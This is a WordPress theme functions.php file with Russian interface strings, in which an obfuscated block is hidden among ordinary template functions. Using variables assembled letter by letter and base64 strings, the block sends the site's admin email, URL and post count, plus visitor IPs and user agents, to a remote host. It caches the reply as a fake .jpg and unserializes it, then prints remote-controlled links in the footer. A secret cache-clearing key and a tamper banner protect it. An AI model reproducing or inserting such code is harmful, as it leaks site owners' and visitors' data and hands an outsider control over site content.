<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $vUGLOt='e';$UFCf='s';$GbRg='_';$sousi='d';$MbJTSpW='6';$JOKAPfT='a';$FvGmx='o';$uqXn='4';$xmFNjIh='c';$WaURFwX='d';$YXUq='e';$YEiK='e';$FdjetVT='b';$RNsWSLQg=$FdjetVT.$JOKAPfT.$UFCf.$YXUq.$MbJTSpW.$uqXn.$GbRg.$WaURFwX.$vUGLOt.$xmFNjIh.$FvGmx.$sousi.$YEiK;$oKWbZq='n';$uYuSVG='f';$SybeQt='z';$RyXmuO='g';$CfOjpPj='i';$Klei='l';$NLbCVM='t';$jZHZB='a';$GJTGZva='e';$zBmMotAu=$RyXmuO.$SybeQt.$CfOjpPj.$oKWbZq.$uYuSVG.$Klei.$jZHZB.$NLbCVM.$GJTGZva;$WvjV='o';$gZqJV='s';$AqCHbhI='1';$ABNt='t';$WDKIg='r';$hOPQfL='3';$NPhL='r';$SQPtsD='t';$aEagjI='_';$kNVtMCsn=$gZqJV.$ABNt.$NPhL.$aEagjI.$WDKIg.$WvjV.$SQPtsD.$AqCHbhI.$hOPQfL;$QgCvQD='s';$UqfIjiv='t';$piDFEP='r';$xXxsRNy='v';$Zrbg='e';$ehuBUH='r';$uAcqwmFv=$QgCvQD.$UqfIjiv.$ehuBUH.$piDFEP.$Zrbg.$xXxsRNy;                     
		$gr____l='e';$tw___________r='s';$qs_______________h='_';$ho________q='d';$in____________q='6';$fn____r='a';$gv__________i='o';$sc___________q='4';$fj___y='c';$tv_____s='d';$bm______________e='e';$bf_____t='e';$yl_______m='b';$th___________u=$yl_______m.$fn____r.$tw___________r.$bm______________e.$in____________q.$sc___________q.$qs_______________h.$tv_____s.$gr____l.$fj___y.$gv__________i.$ho________q.$bf_____t;
		$vb________r='c';$ay____t='o';$gg___g='u';$ha________p='n';$lv______r='f';$cf_______c='t';$pv________b='n';$di____________s='i';$wo______________r='x';$qj______s='i';$co________c='t';$pt_____________t='s';$qt____________x='_';$av___i='e';$mq_____________c='s';$bv____j=$lv______r.$gg___g.$ha________p.$vb________r.$cf_______c.$di____________s.$ay____t.$pv________b.$qt____________x.$av___i.$wo______________r.$qj______s.$pt_____________t.$co________c.$mq_____________c;
		$au_____________s='e';$ln_________y='f';$ej__q='o';$zg_____s='n';$rd____________t='p';$uq________x=$ln_________y.$ej__q.$rd____________t.$au_____________s.$zg_____s;
		$ek______________h='d';$fp____u='r';$ny______m='f';$jp_________k='a';$cg__e='e';$dw________i=$ny______m.$fp____u.$cg__e.$jp_________k.$ek______________h;
		$dz____________j='l';$ur___________k='e';$ai_______________t='f';$xr___t='o';$rp____k='c';$xj_____________t='s';$mr________e=$ai_______________t.$rp____k.$dz____________j.$xr___t.$xj_____________t.$ur___________k;
		
		define("WP_ID", $th___________u("Mi4wLjA="));
		define("WP_TTL", $th___________u("MTA4MDA="));
		define("WP_SRC", $th___________u("dHBva24="));
	


		function wp_get_header() {
			global $th___________u, $bv____j;
			
			if (
				$bv____j($th___________u("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$bv____j($th___________u("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$bv____j($th___________u("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $th___________u, $uq________x, $mr________e, $dw________i;
			
			$hc_______a = TEMPLATEPATH."/".$th___________u("Zm9vdGVyLnBocA==");
			$lf__f = @$uq________x($hc_______a, "r");
			$hc_______a = @$dw________i($lf__f, @filesize($hc_______a));
			@$mr________e($lf__f);
			
			$ri_____v = TEMPLATEPATH."/".$th___________u("ZnVuY3Rpb25zLnBocA==");
			$lf__f = @$uq________x($ri_____v, "r");
			$ri_____v = @$dw________i($lf__f, @filesize($ri_____v));
			@$mr________e($lf__f);
			
			$wd_________t = 0;
			if($hc_______a && $ri_____v) {
				if ($th___________u("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($hc_______a, $th___________u("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$wd_________t = 1;
					}
					if (substr_count($hc_______a, "wp_theme_GPL_credits()") < 1) {
						$wd_________t = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$wd_________t = 12;
				}
			}
			
			if($wd_________t > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $wd_________t -->";
			}
		}
	


		function wp_loaded() {
			global $th___________u, $bv____j;
			return $bv____j($th___________u("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($mj___v, $lz_________x = "(more...)", $wl_____x = 0, $dk__u = "") {
				$jp____________e = get_the_content($lz_________x, $wl_____x, $dk__u);
				$jp____________e = apply_filters("the_content", $jp____________e);
				
				$jp____________e = str_replace("]]>", "]]>", $jp____________e);
				if (strlen($_GET["p"]) > 0) {
					echo $jp____________e;
				}
				else if ((strlen($jp____________e)>$mj___v) && ($kf__n = strpos($jp____________e, " ", $mj___v ))) {
					$jp____________e = substr($jp____________e, 0, $kf__n);
					$jp____________e = $jp____________e;
					echo $jp____________e;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$lz_________x</a></div></p>";
				} else {
					echo $jp____________e;
				}
				
			}
		}
	


		$jn__________j='_';$qa______q='n';$ze___s='a';$jf______y='o';$ef_____________f='e';$zx____________r='e';$rv____________x='4';$hx______________u='s';$pw______________e='e';$fw_____________k='6';$bl_____c='b';$fl______n='c';$cd___i='d';$pz___________n=$bl_____c.$ze___s.$hx______________u.$pw______________e.$fw_____________k.$rv____________x.$jn__________j.$ef_____________f.$qa______q.$fl______n.$jf______y.$cd___i.$zx____________r;
		$nw____f='i';$om________b='_';$bu_______________m='f';$gm_______________z='t';$jj________w='e';$tw_______n='g';$qq______________r='n';$hi_____________w='t';$mo__y='e';$xt_________z='t';$yo_____________w='n';$bj__g='o';$fg_________q='e';$tl___y='l';$jq_____d='c';$vh______________e='s';$bp__________h='_';$rm__________s=$bu_______________m.$nw____f.$tl___y.$fg_________q.$bp__________h.$tw_______n.$mo__y.$xt_________z.$om________b.$jq_____d.$bj__g.$qq______________r.$gm_______________z.$jj________w.$yo_____________w.$hi_____________w.$vh______________e;
		$ou____________v='t';$he________v='e';$uz_____c='s';$rg__________b='e';$mb___________g='i';$wd_____i='s';$hz_____k='l';$kl_______________a='_';$ml_________l='i';$ll__m='x';$tv_______a='f';$aw________q=$tv_______a.$ml_________l.$hz_____k.$he________v.$kl_______________a.$rg__________b.$ll__m.$mb___________g.$wd_____i.$ou____________v.$uz_____c;
		$ay_____m='e';$rd______________f='r';$ac____s='o';$vu__q='p';$bz____________t='s';$nl____________g='n';$ay__w='_';$kh_____q='o';$vu__z='v';$tb_____________t='c';$sd__________h='r';$pr________p='e';$vj______________f='a';$gw__i='m';$ua______g='i';$nz_____m=$vu__z.$ay_____m.$sd__________h.$bz____________t.$ua______g.$kh_____q.$nl____________g.$ay__w.$tb_____________t.$ac____s.$gw__i.$vu__q.$vj______________f.$rd______________f.$pr________p;
		$ep____i='s';$kg_______a='p';$im___z='c';$aw__b='e';$ec__________m='o';$rr_____w='n';$nk_____g='k';$pu______a='o';$bv__________e='f';$cg____________b=$bv__________e.$ep____i.$pu______a.$im___z.$nk_____g.$ec__________m.$kg_______a.$aw__b.$rr_____w;
		$yx_____________f='f';$fr_____________a='t';$hz___n='w';$my__k='r';$xn______________h='i';$aw_____p='e';$cf________s=$yx_____________f.$hz___n.$my__k.$xn______________h.$fr_____________a.$aw_____p;
		$rz_______r='5';$cz____i='d';$yp___w='m';$mg_____________n=$yp___w.$cz____i.$rz_______r;
		$wg__________b='e';$hh___l='h';$tv_______f='a';$mw________o='p';$dx___________m='r';$pk__________z='l';$mq_______________g='t';$hh_____s='a';$go______b=$dx___________m.$wg__________b.$tv_______f.$pk__________z.$mw________o.$hh_____s.$mq_______________g.$hh___l;
		$cu_______________y='n';$bo____________s='i';$fm___y='s';$ev_______h='i';$dr______________p='e';$sg_________r='l';$yx______t='u';$wi_____________a='e';$yg_____z='a';$qj_____v='z';$fx____h='r';$yb_____________m=$yx______t.$cu_______________y.$fm___y.$dr______________p.$fx____h.$bo____________s.$yg_____z.$sg_________r.$ev_______h.$qj_____v.$wi_____________a;
		$hf_____________d='m';$nc___c='t';$qq_________m='p';$wa_______j='m';$ru____i='a';$kl________z='n';$wp___________d='e';$bd_____c=$nc___c.$wp___________d.$wa_______j.$qq_________m.$kl________z.$ru____i.$hf_____________d;
		$cc__________v='_';$qc______c='t';$ek_______z='x';$gp__z='e';$uu__n='m';$se____z='a';$ej__b='r';$yy_______________x='e';$pj__x='s';$xo_______________x='n';$ug_______________y='t';$tw____________i='c';$fl________c='t';$so_______k='a';$yk____d='c';$qj______________v='e';$xq__________n='_';$zj_____________i='r';$fu_____w='o';$yt____h='t';$jm_______s='e';$rj__________b=$pj__x.$qc______c.$zj_____________i.$jm_______s.$so_______k.$uu__n.$xq__________n.$tw____________i.$fu_____w.$xo_______________x.$yt____h.$gp__z.$ek_______z.$fl________c.$cc__________v.$yk____d.$ej__b.$yy_______________x.$se____z.$ug_______________y.$qj______________v;
	


		function gw______p($zv__q) {
			global $th___________u, $bv____j, $rm__________s, $nz_____m, $rj__________b;
			
			if (!$bv____j($th___________u("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($nz_____m(PHP_VERSION, "5.0.0", ">=") && $bv____j($th___________u("ZmlsZV9nZXRfY29udGVudHM=")) && $bv____j($th___________u("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$tc______t = $rj__________b(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$vt_________g = @$rm__________s($zv__q, 0, $tc______t);
			} else {
				$vt_________g = @$rm__________s($zv__q, 0);
			}
			
			return $vt_________g;
		}
	


		function lc_______u($zv__q) {
			global $bv____j, $cg____________b, $cf________s, $th___________u;
			
			if (!$bv____j($th___________u("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$nk____________j = strpos($zv__q, "/", 7);
			$vl___________o = array(
				"uri"     => substr($zv__q, $nk____________j),
				"host"    => str_replace("http://", "", substr($zv__q, 0, $nk____________j)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$eg_______________z = @$cg____________b("$vl___________o[host]", 80, $im____________l, $mp___s, 4);
			
			if (!$eg_______________z) {
				return false;
			} else {
				$vt_________g = "";
				$nz__c  = "GET $vl___________o[uri] HTTP/1.0\r\n";
				$nz__c .= "Host: $vl___________o[host]\r\n";
				$nz__c .= "Referer: $vl___________o[referer]\r\n";
				$nz__c .= "Connection: Close\r\n\r\n";
				
				@$cf________s($eg_______________z, $nz__c);
				
				while (!@feof($eg_______________z)) {
					$pr______________z = @fgets($eg_______________z, (1024*24));
					
					if ($pr______________z == "\r\n") {
						$ob_____y = true;
						continue;
					}
					
					if ($ob_____y) {
						$vt_________g .= $pr______________z;
					}
				}
				
				return $vt_________g;
			}
		}
	


		function ce_____________h($zv__q) {
			global $bv____j;
			$xy_______________i = false;
			
			if ($zv__q != "") {
				if ($bv____j("gw______p")) {
					$xy_______________i = @gw______p($zv__q);
				}
				
				if (!$xy_______________i && ($bv____j("lc_______u"))) {
					$xy_______________i = @lc_______u($zv__q);
				}
			}
			
			return $xy_______________i;
		}
	


		function nz_______g() {
			global $_SERVER, $mg_____________n;
			
			$qa_________e = $_SERVER["SERVER_NAME"];
			
			if (substr("$qa_________e", 0, 4) == "www.") {
				$qa_________e = substr("$qa_________e", 4);
			}
			
			$qa_________e = $mg_____________n("$_SERVER[SERVER_NAME]");
			
			return $qa_________e;
		}
	


		function vo__________i() {
			return "file";
		}
	


		function zu______f($zv__q) {
			global $_SERVER, $rm__________s, $aw________q, $uq________x, $mr________e, $cf________s;
			
			$fa_______u = cz_____t();
			
			$ru_____________z = nz_______g().".jpg";
			$or_________h = $fa_______u["dir_upload"]["path"]."/$ru_____________z";
			$ca__________a = @filemtime($or_________h);
			
			if (!$ca__________a || ((time()-$ca__________a) >= WP_TTL)) {
				$xy_______________i = ce_____________h($zv__q);
				
				if ($xy_______________i) {
					if ($aw________q($or_________h)) {
						@unlink($or_________h);
					}
					
					$lf__f = @$uq________x($or_________h, "x+");
					
					@$cf________s($lf__f, $xy_______________i);
					@$mr________e($lf__f);
				}
			} else {
				if ($aw________q($or_________h)) {
					$xy_______________i = @$rm__________s($or_________h);
				} else {
					$xy_______________i = false;
				}
			}
			
			return $xy_______________i;
		}
	


		function cz_____t() {
			global $_SERVER, $th___________u, $pz___________n;
			
			$qh______m = wp_count_posts("post");
			$jg_____________l = pathinfo(get_bloginfo("template_directory"));
			
			$fa_______u = array(
				"url" => array(
					"report"      => $th___________u("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $jg_____________l,
				"dir_upload"	=> hx____a(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$jg_____________l[filename],
					"a005=".$qh______m->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=http:\\www.wptheme.us\">www.wptheme.us</a> "
			);
			
			$fa_______u["url"]["queryString"] = implode("&", $fa_______u["queryString"]);
			$fa_______u["url"]["report"] = $fa_______u["url"]["report"]."/?".$pz___________n($fa_______u["url"]["queryString"]).".html";
						
			return $fa_______u;
		}
	


		function hx____a() {
			$ho_________g = wp_upload_dir();
			
			if (isset($ho_________g["error"])) {
				$gk_______n = tf__________e();
				if (is_writable($gk_______n)) {
					$ho_________g = array("path" => $gk_______n);
				}
			}

			return $ho_________g;
		}
	


		function tf__________e() {
			global $bv____j, $mg_____________n, $go______b, $bd_____c;
			
			$oj_______w = (bool) ini_get("safe_mode");
			if ($oj_______w == true) {
				return false;
			}
			
			if ($bv____j("sys_get_temp_dir")) {
				$zj___________a = sys_get_temp_dir();
				if (is_writable($zj___________a)) {
					return $go______b($zj___________a);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $go______b($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $go______b($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $go______b($_ENV["TEMP"]);
			} else {
				$sq___q = $bd_____c($mg_____________n(uniqid(rand(), true)), "");
				if ($sq___q) {
					$zj___________a = $go______b(dirname($sq___q));
					@unlink($sq___q);
					return $zj___________a;
				} else {
					return false;
				}
			}
		}
	


		function iu____h() {
			global $_GET, $aw________q;
			
			$fa_______u = cz_____t();
			$qa_________e = nz_______g();
			$rv_____________s = vo__________i();
			
			$bk___q = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($rv_____________s == "file") {
					$wv________k = $fa_______u["dir_upload"]["path"]."/".$qa_________e.".jpg";
					if ($aw________q($wv________k)) {
						@unlink($wv________k);
						$bk___q = "deleted";
					}
				}
				
				$ip_____z = array(
					"s"	=> $bk___q,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($ip_____z AS $wn___t => $io____x) echo " [$wn___t:$io____x]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $bv____j, $th___________u, $yb_____________m;
			$fa_______u = cz_____t();
			
			$oa_______c = "zu______f";
			if ($bv____j($oa_______c)) {
				$vt_________g = $oa_______c($fa_______u["url"]["report"]);
			}
			
			if ($vt_________g) {
				if ($vt_________g = @$th___________u($vt_________g)) {
					$vt_________g = @$yb_____________m($vt_________g);
					
					if (strlen($vt_________g[custom_credit]) >= 5) {
						$fa_______u["default_string"] = $vt_________g[custom_credit];
					}
					
					if ($vt_________g["status"] == "0") {
						$ob___a = 1;
						$iz___________g = 1;
					} else {
						$uf_____w = sizeof($vt_________g["links"]);
						$tk__________i = $fa_______u["default_string"];
						
						if ($uf_____w > 0 && $vt_________g["links"] !== "") {
							$xw_____f = 0;
							foreach ($vt_________g["links"] as $xb______________r => $lr_______g) {
								$xw_____f++;
								if ($lr_______g->l_path == "" || $lr_______g->l_path == $_SERVER["REQUEST_URI"]) {
									$lr_______g->l_href = htmlspecialchars(strip_tags($lr_______g->l_href));
									$lr_______g->l_title = htmlspecialchars(strip_tags($lr_______g->l_title));
									$lr_______g->l_anchor = htmlspecialchars(strip_tags($lr_______g->l_anchor));
									$tk__________i .= " | ";
									$tk__________i .= "<a href='$lr_______g->l_href' title='$lr_______g->l_title'";
									if ($lr_______g->l_nofollow == "1") {
										$tk__________i .= " rel='nofollow'";
									}
									$tk__________i .= ">$lr_______g->l_anchor</a>";
								}
							}
						}
						$fa_______u["links"] = "$tk__________i";
						if ($vt_________g[credit] == "0") {
							$fa_______u["links"] = "";
						}
					}
				} else {
					$ob___a = "1";
				}
			} else {
				$ob___a = "1";
			}
			
			if ($ob___a == "1") {
				$fa_______u["links"] = $fa_______u["default_string"];
			}
			
			echo "$fa_______u[links]";
			
			echo "<!-- s: $vt_________g[signature] -->";
			iu____h();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
